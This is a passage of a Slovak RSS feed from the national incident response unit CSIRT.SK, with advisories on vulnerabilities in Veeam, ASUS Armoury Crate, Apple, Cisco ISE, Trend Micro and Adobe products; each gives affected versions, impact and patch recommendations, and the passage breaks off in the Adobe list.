					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam vydala bezpečnostné aktualizácie na svoj produkt Backup &#38; Replication, ktoré opravujú 2 zraniteľnosti, z&#160;ktorých jedna je označená ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie na svoj produkt Backup </strong><strong>&amp;</strong><strong> Replication, ktoré opravujú 2 zraniteľnosti, z&nbsp;ktorých jedna je označená ako kritická. CVE-2025-23121 by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Backup &amp; Replication vo verziách 12.3.1.1139 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-23121 </strong>(CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť by vzdialený autentifikovaný doménový používateľ mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> s&nbsp;následkom <strong>úplného narušenia dôvernosti, integrity a&nbsp;dostupnosti systému</strong>. <strong>Zraniteľnosť je možné zneužiť len na inštanciách zapojených do domény.</strong></p>



<p><strong>CVE-2025-24286 </strong>(CVSS skóre 7,2)</p>



<p>Zraniteľnosť vysokej závažnosti by vzdialený autentifikovaný používateľ s&nbsp;oprávneniami Backup Operator mohol zneužiť na <strong>modifikáciu zálohovacích operácií</strong> a&nbsp;<strong>vykonanie ľubovoľného kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Veeam Backup &amp; Replication na verziu 12.3.2.3617 alebo novšiu. V&nbsp;prípade, že prevádzkujete inštancie produktu zapojené do domény, odporúčame aplikovať best practice postupy, ktoré odporúča <a href="https://bp.veeam.com/security/Design-and-implementation/Hardening/Workgroup_or_Domain.html#best-practice">výrobca</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.veeam.com/kb4743">https://www.veeam.com/kb4743</a></li>



<li><a href="https://www.rapid7.com/blog/post/etr-critical-veeam-backup-replication-cve-2025-23121/">https://www.rapid7.com/blog/post/etr-critical-veeam-backup-replication-cve-2025-23121/</a></li>



<li><a href="https://thehackernews.com/2025/06/veeam-patches-cve-2025-23121-critical.html">https://thehackernews.com/2025/06/veeam-patches-cve-2025-23121-critical.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2480/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažná zraniteľnosť v ASUS Armoury Crate</title>
		<link>/posts/2478</link>
					<comments>/posts/2478#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 24 Jun 2025 14:40:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ASUS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2478</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/asus.png" alt="" /></p>Spoločnosť ASUS vydala bezpečnostné aktualizácie svojho softvéru pre manažment systému Armoury Crate, ktoré opravujú vysoko závažnú zraniteľnosť. Zraniteľnosť s&#160;identifikátorom CVE-2025-3464...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/asus.png" alt="" /></p>
<p><strong>Spoločnosť ASUS vydala bezpečnostné aktualizácie svojho softvéru pre manažment systému Armoury Crate, ktoré opravujú vysoko závažnú zraniteľnosť. Zraniteľnosť s&nbsp;identifikátorom CVE-2025-3464 možno zneužiť na eskaláciu privilégií a&nbsp;získanie administrátorského prístupu k&nbsp;systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ASUS Armoury Crate vo verziách V5.9.9.0 až V6.1.18.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-3464 </strong><strong>&nbsp;</strong>(CVSS 4.0 skóre: 8,4)</p>



<p>Zraniteľnosť softvéru Armoury Crate sa nachádza v&nbsp;ovládači AsIO3.sys. Spočíva v&nbsp;súbehu procesov a&nbsp;skutočnosti, že ovládač overuje legitimitu volaní na základe napevno kódovaného SHA256 hashu súboru AsusCertService.exe. Lokálny autentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného „hard link“ odkazu mohol zneužiť na <strong>obídenie autorizácie</strong>, <strong>eskaláciu privilégií</strong> na úroveň používateľa SYSTEM a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p>Pozn.: Zraniteľnosť objavili bezpečnostní výskumníci z&nbsp;Cisco Talos.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu ASUS Armoury Crate na najnovšiu verziu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.asus.com/content/asus-product-security-advisory/">https://www.asus.com/content/asus-product-security-advisory/</a> (časť 06/16/2025 Security Update for Armoury Crate App)</li>



<li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2150">https://talosintelligence.com/vulnerability_reports/TALOS-2025-2150</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-3464">https://nvd.nist.gov/vuln/detail/CVE-2025-3464</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/asus-armoury-crate-bug-lets-attackers-get-windows-admin-privileges/">https://www.bleepingcomputer.com/news/security/asus-armoury-crate-bug-lets-attackers-get-windows-admin-privileges/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2478/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Februárové zraniteľnosti v operačných systémoch Apple boli zneužité na inštaláciu špionážneho softvéru</title>
		<link>/posts/2007</link>
					<comments>/posts/2007#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 24 Jun 2025 14:39:09 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=2007</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť v operačných systémoch iOS a iPadOS. Zraniteľnosť s označením CVE-2025-24200...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť v operačných systémoch iOS a iPadOS. Zraniteľnosť s označením CVE-2025-24200 by útočník s fyzickým prístupom k&nbsp;uzamknutým zariadeniam mohol zneužiť na deaktiváciu bezpečnostného mechanizmu USB Restricted Mode.</strong><strong></strong></p>



<p><strong>Aktualizácia 19.06.2025: Spoločnosť Apple 11. júna 2025 doplnila popis aktualizácií&nbsp; </strong><a href="https://support.apple.com/en-us/122174"><strong>iOS</strong></a><strong>, </strong><a href="https://support.apple.com/en-us/122173"><strong>iPadOS</strong></a><strong>, </strong><a href="https://support.apple.com/en-us/122902"><strong>macOS Ventura</strong></a><strong>, </strong><a href="https://support.apple.com/en-us/122901"><strong>macOS Sonoma</strong></a><strong>, </strong><a href="https://support.apple.com/en-us/122900"><strong>macOS Sequoia</strong></a><strong>, </strong><a href="https://support.apple.com/en-us/122903"><strong>watchOS</strong></a><strong> a </strong><a href="https://support.apple.com/en-us/122904"><strong>visionOS</strong></a><strong> z&nbsp;10. februára 2025 o zero-click zraniteľnosť s&nbsp;identifikátorom CVE-2025-43200. Zraniteľnosť bola podľa </strong><a href="https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/"><strong>analýzy The Citizen Lab</strong></a><strong> zneužitá na inštaláciu špionážneho softvéru Graphite od spoločnosti Paragon. Kompromitované mali byť mobilné zariadenia viacerých novinárov v&nbsp;Európe.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia s operačným systémom iPadOS 17.X vo verzii staršej ako 17.7.5</li>



<li>Zariadenia s operačným systémom iPadOS 18.X vo verzii staršej ako 18.3.1</li>



<li>Zariadenia s operačným systémom iOS 18.X vo verzii staršej ako 18.3.1</li>



<li>Zariadenia s operačným systémom visionOS 2.X vo verzii staršej ako 2.3.1</li>



<li>Zariadenia s operačným systémom macOS Sequoia 15.X vo verzii staršej ako 15.3.1</li>



<li>Zariadenia s operačným systémom macOS Sonoma 14.X vo verzii staršej ako 14.7.4</li>



<li>Zariadenia s operačným systémom macOS Ventura 13.X vo verzii staršej ako 13.7.4</li>



<li>Zariadenia s operačným systémom watchOS 11.X vo verzii staršej ako 11.3.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-43200 </strong>(CVSS v4.0 skóre: -)</p>



<p>Zraniteľnosť v&nbsp;aplikácii Messages spočíva v&nbsp;logickej chybe pri spracovaní foto a&nbsp;video obsahu zdieľaného prostredníctvom odkazov na iCloud. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených súborov mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad zariadením</strong>.</p>



<p><strong>Pozn.: Jedná sa o&nbsp;aktívne zneužívanú&nbsp;tzv. zero-click zraniteľnosť, ktorej zneužitie nevyžaduje interakciu zo strany obete.</strong><strong></strong></p>



<p><strong>CVE-2025-24200 </strong>(CVSS v4.0 skóre: 7.0)</p>



<p>Bližšie nešpecifikovaný problém s autorizáciou by útočník s fyzickým prístupom k zariadeniu mohol zneužiť na <strong>deaktiváciu bezpečnostného mechanizmu <a href="https://support.apple.com/en-us/111806">USB Restricted Mode</a> a to aj na uzamknutých zariadeniach</strong>. Uvedená funkcionalita po hodinovej nečinnosti zariadenia aktívne blokuje všetku komunikáciu s externým príslušenstvom, ktorú na prenik do systémov využívajú aj legitímne forenzné nástroje ako Cellebrite a Graykey.</p>



<p><strong>Zraniteľnosť je v súčasnosti aktívne zneužívaná v rámci cielených útokov.</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Apple odporúča bezodkladnú aktualizáciu operačných systémov iPadOS na verziu 17.7.5 alebo 18.3.1, iOS na verziu 18.3.1, visionOS na verziu 2.3.1, macOS Sequoia na verziu 15.3.1, macOS Sonoma na verziu 14.7.4, macOS Ventura na verziu 13.7.4 a watchOS 11.X na verziu 11.3.1.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/122173">https://support.apple.com/en-us/122173</a></li>



<li><a href="https://support.apple.com/en-us/122174">https://support.apple.com/en-us/122174</a></li>



<li><a href="https://thehackernews.com/2025/02/apple-patches-actively-exploited-ios.html">https://thehackernews.com/2025/02/apple-patches-actively-exploited-ios.html</a></li>



<li><a href="https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/">https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/</a></li>



<li><a href="https://thehackernews.com/2025/06/apple-zero-click-flaw-in-messages.html">https://thehackernews.com/2025/06/apple-zero-click-flaw-in-messages.html</a><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-43200">https://nvd.nist.gov/vuln/detail/CVE-2025-43200</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2007/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – máj 2025</title>
		<link>/posts/2472</link>
					<comments>/posts/2472#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Jun 2025 16:00:38 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2472</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci máj 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci máj 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/06/MS202505.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 05/2025 PDF (1 527 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2472/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická a stredne závažné zraniteľnosti Cisco ISE a CCP s verejným exploitom</title>
		<link>/posts/2429</link>
					<comments>/posts/2429#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Jun 2025 14:38:56 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=2429</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie na produkty Identity Services Engine a Customer Collaboration Platform, ktoré opravujú viaceré bezpečnostné zraniteľnosti, pre...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie na produkty Identity Services Engine a Customer Collaboration Platform, ktoré opravujú viaceré bezpečnostné zraniteľnosti, pre ktoré existuje verejne dostupný kód exploitu. Tieto zraniteľnosti možno zneužiť na získanie neoprávneného prístupu do systému,&nbsp;vykonanie administratívnych zmien, nahrávanie súborov, či získanie citlivých údajov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cloudové inštancie Cisco Identity Services Engine (ISE)<ul><li>&nbsp;na AWS: verzie ISE 3.1 &#8211; 3.4</li></ul><ul><li>&nbsp;na Azure: verzie ISE 3.2 &#8211; 3.4</li></ul>
<ul>
<li>&nbsp;na OCI: verzie ISE 3.2 &#8211; 3.4</li>
</ul>
</li>



<li>Cisco Cloud Platform (CCP) verzie staršie ako 15.0</li>
</ul>



<p>Pozn.: Zraniteľnosť CVE-2025-20286 je zneužiteľná, pokiaľ je uzol Primary Administration pre Cisco ISE nasadený v cloude.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-20286 </strong>(CVSS skóre 9,9)</p>



<p>Spoločnosť Cisco varuje pred zraniteľnosťou v systémoch Identity Services Engine (ISE), pre ktorú existuje verejne dostupný kód exploitu. Zraniteľnosť spočíva v&nbsp;nevhodne generovaných prihlasovacích údajoch pri nasadzovaní ISE na cloud. Zraniteľné sú cloudové nasadenia na AWS, Azure a OCI. Vzdialený útočník môže obísť autentifikáciu a získať neoprávnený prístup k&nbsp;systémom a&nbsp;dátam, obmedzene vykonávať administratívne operácie a&nbsp;ovplyvniť dostupnosť služieb.</p>



<p>On-premise verzie ISE nie sú ovplyvnené, podobne ako cloudové riešenia na Google Cloud VMware Engine, VMware cloud na AWS a&nbsp;na Azure VMware Solution (AVS).</p>



<p><strong>CVE-2025-20129</strong> (CVSSv3 4.3)</p>



<p>Zraniteľnosť CVE-2025-20129 umožňuje získavanie informácií z&nbsp;Cisco Customer Collaboration Platform (CCP) a&nbsp;súvisí s&nbsp;nevhodnou sanitizáciou požiadaviek http smerujúcich na webové chatové rozhranie. Vzdialený neautentifikovaný útočník ju môže zneužiť odoslaním špeciálne vytvorenej požiadavky HTTP na chatové rozhranie obete a&nbsp;presmerovať k&nbsp;sebe citlivé informácie.</p>



<p>Pre zraniteľnosť existuje verejne dostupný kód exploitu.</p>



<p><strong>CVE-2025-20130</strong> (CVSSv3 4.9)</p>



<p>Zraniteľnosť strednej závažnosti súvisí s&nbsp;nevhodným overovaním v&nbsp;rámci funkcie pre kopírovanie súborov. Umožňuje nahrávanie súborov na Cisco ISE a&nbsp;ISE-PIC odoslaním upravenej požiadavky na nahratie súboru na špecifický koncový bod API. Útočník potrebuje pre jej zneužitie administrátorské oprávnenia.</p>



<p>Pre zraniteľnosť existuje verejne dostupný kód exploitu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých údajov</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Cisco ISE aspoň na verziu 3.3 P8 alebo 3.4 P3 a&nbsp;Cisco CCP aspoň na verziu 15.0.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccp-info-disc-ZyGerQpd">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccp-info-disc-ZyGerQpd</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-file-upload-P4M8vwXY">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-file-upload-P4M8vwXY</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-ise-and-ccp-flaws-with-public-exploit-code/">https://www.bleepingcomputer.com/news/security/cisco-warns-of-ise-and-ccp-flaws-with-public-exploit-code/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2429/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v Trend Micro Apex Central a Endpoint Encryption PolicyServer</title>
		<link>/posts/2427</link>
					<comments>/posts/2427#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Jun 2025 13:23:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Trend Micro]]></category>
		<guid isPermaLink="false">/?p=2427</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/trend-micro-logosvg.jpg" alt="" /></p>Spoločnosť Trend Micro vydala bezpečnostné aktualizácie na svoje produkty, ktoré opravujú viaceré kritické bezpečnostné zraniteľnosti. CVE-2025-49219 a CVE-2025-49220 v Apex...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/trend-micro-logosvg.jpg" alt="" /></p>
<p><strong>Spoločnosť Trend Micro vydala bezpečnostné aktualizácie na svoje produkty, ktoré opravujú viaceré kritické bezpečnostné zraniteľnosti. CVE-2025-49219 a CVE-2025-49220 v Apex Central možno zneužiť na vzdialené vykonanie kódu. CVE-2025-49216, CVE-2025-49212, CVE-2025-49213 a CVE-2025-49217 v Endpoint Encryption PolicyServer možno zneužiť na získanie neoprávneného prístupu do systému a&nbsp;vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Trend Micro Apex Central (on-prem) 2019 bez inštalovanej záplaty CP B7007</li>



<li>Trend Micro Apex Central as a&nbsp;Service vo verziách starších ako April 2025 Monthly Release</li>



<li>Trend Micro Endpoint Encryption (TMEE) PolicyServer vo verziách starších ako 6.0.0.4013 bez inštalovanej záplaty Patch 1 Update 6</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Trend Micro Apex Central:</u></strong></p>



<p><strong>CVE-2025-49219, CVE-2025-49220 </strong>(CVSS skóre 9,8)</p>



<p>Kritické zraniteľnosti spočívajú v&nbsp;absencii overovania používateľských vstupov v&nbsp;rámci metód GetReportDetailView (CVE-2025-49219) a ConvertFromJson (CVE-2025-49220). Vzdialený neautentifikovaný útočník by ich mohol zneužiť zaslaním špeciálne vytvorených vstupov, ktorých deserializácia vedie ku&nbsp;<strong>vzdialenému vykonanie kódu</strong>.</p>



<p><strong><u>Trend Micro Endpoint Encryption PolicyServer:</u></strong></p>



<p><strong>CVE-2025-49216</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nesprávnej implementácii autentifikačného algoritmu používaného v&nbsp;rámci služby DbAppDomain. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>obídenie mechanizmov autentifikácie</strong> a&nbsp;<strong>získanie neoprávneného vstupu do systému s&nbsp;oprávneniami administrátora</strong>.</p>



<p><strong>CVE-2025-49212, CVE-2025-49213, CVE-2025-49217 </strong>(CVSS skóre 9,8)</p>



<p>Kritické zraniteľnosti spočívajú v&nbsp;absencii overovania používateľských vstupov v&nbsp;rámci metód ValidateToken (CVE-2025-49217) a triedach PolicyServerWindowsService (CVE-2025-49213) a&nbsp;PolicyValueTableSerializationBinder (CVE-2025-49212). Vzdialený neautentifikovaný útočník by ich mohol zneužiť zaslaním špeciálne vytvorených vstupov, ktorých deserializácia môže viesť ku&nbsp;<strong>vzdialenému vykonaniu kódu</strong>.</p>



<p><strong>Pozn.: Zreťazením uvedených zraniteľností možno získať úplnú kontrolu nad systémom.</strong></p>



<p>Ostatné zraniteľnosti v&nbsp;produkte Endpoint Encryption PolicyServer možno zneužiť na realizáciu SQL injekcie a eskalácie privilégií (CVE-2025-49218, CVE-2025-49215 a CVE-2025-49211).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú inštaláciu bezpečnostnej záplaty <a href="https://files.trendmicro.com/products/apexcentral/CP/apexcentral-win-en-criticalpatch-b7007.exe">CP B7007</a> pre Apex Central a <a href="https://downloadcenter.trendmicro.com/index.php?clk=tbl&amp;clkval=5078">Patch 1 Update 6</a> pre Endpoint Encryption (TMEE) PolicyServer.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/trend-micro-fixes-six-critical-flaws-on-apex-central-endpoint-encryption-policyserver/">https://www.bleepingcomputer.com/news/security/trend-micro-fixes-six-critical-flaws-on-apex-central-endpoint-encryption-policyserver/</a></li>



<li><a href="https://success.trendmicro.com/en-US/solution/KA-0019928">https://success.trendmicro.com/en-US/solution/KA-0019928</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-374/">https://www.zerodayinitiative.com/advisories/ZDI-25-374/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-373/">https://www.zerodayinitiative.com/advisories/ZDI-25-373/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-370/">https://www.zerodayinitiative.com/advisories/ZDI-25-370/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-369/">https://www.zerodayinitiative.com/advisories/ZDI-25-369/</a></li>



<li><a href="https://success.trendmicro.com/en-US/solution/KA-0019926">https://success.trendmicro.com/en-US/solution/KA-0019926</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-366/">https://www.zerodayinitiative.com/advisories/ZDI-25-366/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-367/">https://www.zerodayinitiative.com/advisories/ZDI-25-367/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2427/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/2425</link>
					<comments>/posts/2425#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Jun 2025 13:20:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2425</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty InCopy, Experience Manager, Commerce, InDesign, Substance 3D Sampler, Acrobat Reader a&#160;Substance 3D...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty InCopy, Experience Manager, Commerce, InDesign, Substance 3D Sampler, Acrobat Reader a&nbsp;Substance 3D Painter, ktoré opravujú 252 zraniteľností, z&nbsp;čoho &nbsp;18 je označených ako kritických. Kritické zraniteľnosti by vzdialený útočník mohol zneužiť na obídenie bezpečnostných prvkov, eskaláciu privilégií a&nbsp;vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe InCopy vo verziách starších ako 20.3</li>



<li>Adobe InCopy vo verziách starších ako 19.5.4</li>



<li>Adobe Experience Manager (AEM)  vo verziách starších ako AEM Cloud Service Release 2025.5</li>



<li>Adobe Experience Manager (AEM)  vo verziách starších ako 6.5.23</li>



<li>Adobe Commerce 2.4.9 vo verziách starších ako 2.4.9</li>



<li>Adobe Commerce 2.4.8  vo verziách starších ako 2.4.8-p1</li>



<li>Adobe Commerce 2.4.7  vo verziách starších ako 2.4.7-p6</li>



<li>Adobe Commerce 2.4.6  vo verziách starších ako 2.4.6-p11</li>



<li>Adobe Commerce 2.4.5  vo verziách starších ako 2.4.5-p13</li>



<li>Adobe Commerce 2.4.4  vo verziách starších ako 2.4.4-p14</li>



<li>Adobe Commerce B2B 1.5.3vo verziách starších ako 1.5.3-alpha1</li>



<li>Adobe Commerce B2B 1.5.2 vo verziách starších ako 1.5.2-p1</li>



<li>Adobe Commerce B2B 1.4.2 vo verziách starších ako 1.4.2-p6</li>



<li>Adobe Commerce B2B 1.3.4 vo verziách starších ako 1.3.4-p13</li>



<li>Adobe Commerce B2B 1.3.3 vo verziách starších ako 1.3.3-p14</li>



<li>Magento Open Source 2.4.9 vo verziách starších ako 2.4.9-alpha1</li>



<li>Magento Open Source 2.4.8 vo verziách starších ako 2.4.8-p1</li>



<li>Magento Open Source 2.4.7 vo verziách starších ako 2.4.7-p6</li>



<li>Magento Open Source 2.4.6 vo verziách starších ako 2.4.6-p11</li>



<li>Magento Open Source 2.4.5 vo verziách starších ako 2.4.5-p13</li>



<li>Adobe Commerce and Magento Open Source bez inštalovaného patchu pre CVE-2025-47110</li>



<li>Adobe InDesign vo verziách starších ako ID20.3</li>



<li>Adobe InDesign vo verziách starších ako ID19.5.4</li>



<li>Adobe Substance 3D Sampler vo verziách starších ako 5.0.3</li>



<li>Acrobat DC, Acrobat Reader DC vo verziách starších ako 25.001.20531 (Win)</li>



<li>Acrobat DC, Acrobat Reader DC vo verziách starších ako 25.001.20529 (Mac)</li>



